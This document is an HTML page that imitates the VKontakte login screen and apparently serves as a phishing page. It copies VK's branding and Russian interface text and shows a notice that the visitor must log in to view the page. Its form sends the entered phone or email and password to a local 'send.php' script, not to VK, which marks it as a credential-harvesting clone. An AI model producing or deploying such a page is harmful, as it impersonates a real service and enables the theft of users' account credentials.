<!DOCTYPE html>
<html>
<head>
	<title>Добро пожаловать - ВКонтакте</title>
	<style>
body {
	width: 1366px;
	height: 768px;
	margin: 0px;
	padding: 0px;
	background-color: #e7e8ec;
	font-family: Arial, "Helvetica Neue", Helvetica, sans-serif;
}
#body {
	position: absolute;
	left: 185px;
	top: 55px;
	height: 600px;
	width: 986px;
}
#top_div {
	width: 100%;
	height: 40px;
	background-color: #5181b8;
	box-shadow: 0px 0px 1px 0px gray;
}
#left_div {
	position: absolute;
	top: 10px;
	left: 0px;
	width: 150px;
	height: 250px;
}
#right_div {
	border-radius: 8px;
	position: absolute;
	left: 166px;
	top: 0px;
	width: 820px;
	height: 600px;
	background-color: white;
	box-shadow: 0px 0px 1px 0px gray;
}
#alert {
	text-align: center;
	position: absolute;
	width: 820px;
	height: 40px;
	left: 0px;
	top: 40px;
	font-size: medium;
	box-shadow: 0px 0px 3px 0px rgb(220, 10, 10);
	background-color: rgb(240, 210, 100);
}
p {
	margin: 10px;
	margin-right: 330px;
}
#reg {
	position: absolute;
	width: 100px;
	height: 40px;
	top: 0px;
	right: 196px;
	font-size: small;
	color: white;
	cursor: pointer;
}
#reg_folder {
	position: absolute;
	width: 88px;
	height: 28px;
	top: 12px;
	left: 10px;
}
#login_button, #reg_button {
	position: absolute;
	border-radius: 4px;
	background-color: #5181b8;
	width: 100%;
	height: 30px;
	box-shadow: 0px 0px 1px 0px gray;
	color: white;
	font-size: small;
	cursor: pointer;
	align: center;
}
#login_button { left: 0px; top: 135px; }
#reg_button { left: 0px; top: 175px; }
#forgot_pass {
	position: absolute;
	left: 0px;
	top: 215px;
	width: 100%;
	height: 20px;
	color: #5181b8;
	text-align: center;
	font-size: small;
}
#tele_mail, #pass {
	position: absolute;
	width: 100%;
	height: 55px;
	color: rgb(80, 80, 80);
	font-size: small;
}
#tele_mail{ left: 0px; top: 0px; }
#pass { left: 0px; top: 65px; }
a {
	text-decoration: none;
	color: #5181b8;
}
a:hover {
	text-decoration: underline;
}
a:visited {
	text-decoration: underline;
	color: #5181b8;
}
#login_button:hover, #reg_button:hover {
	background-color: rgb(80, 130, 220);
}
#reg:hover {
	background-color: rgb(40, 65, 110);
}
#login_button_folder, #reg_button_folder {
	width: 90px;
	position: absolute;
	text-align: center;
	top: 6px;
	left: 50%;
	margin-left: -45px;
}
input {
	position: absolute;
	width: 140px;
	left: 2px;
	top: 25px;
	height: 22px;
}
#png_folder {
	position: absolute;
	width: 40px;
	height: 40px;
	top: 0px;
	left: 185px;
	cursor: pointer;
}
input[type=submit] { border-radius: 4px; border: 0 none; }
	</style>
</head>




<body>
	<div id="top_div">
		<div id="png_folder">
			<img src="png.png" height="40px" width="40px" />
		</div>
		<div id="reg">
			<div id="reg_folder"><b>Регистрация</b></div>
		</div>
	</div>
	<div id="body">
		<div id="left_div">
			<div id="tele_mail">
				<b>Телефон или email</b>
				<form action="send.php" method="post">
					<input type="text" name="numOrMail" />
			</div>
			<div id="pass">
				<b>Пароль</b>
					<input type="password" name="pswd" />
			</div>
			<input type="submit" value="Войти" id="login_button">
				<!--<div id="login_button_folder">
				</div>--></input>
				</form>
			<div id="reg_button">
				<div id="reg_button_folder">Регистрация</div>
			</div>
			<div id="forgot_pass">
				<a href="">Забыли пароль?</a>
			</div>
		</div>
		<div id="right_div">
			<div id="alert"><p>Чтобы просматривать эту страницу, вам необходимо <b>войти</b>.</p></div>
		</div>
	</div>
	<div id=""></div>
</body>
</html>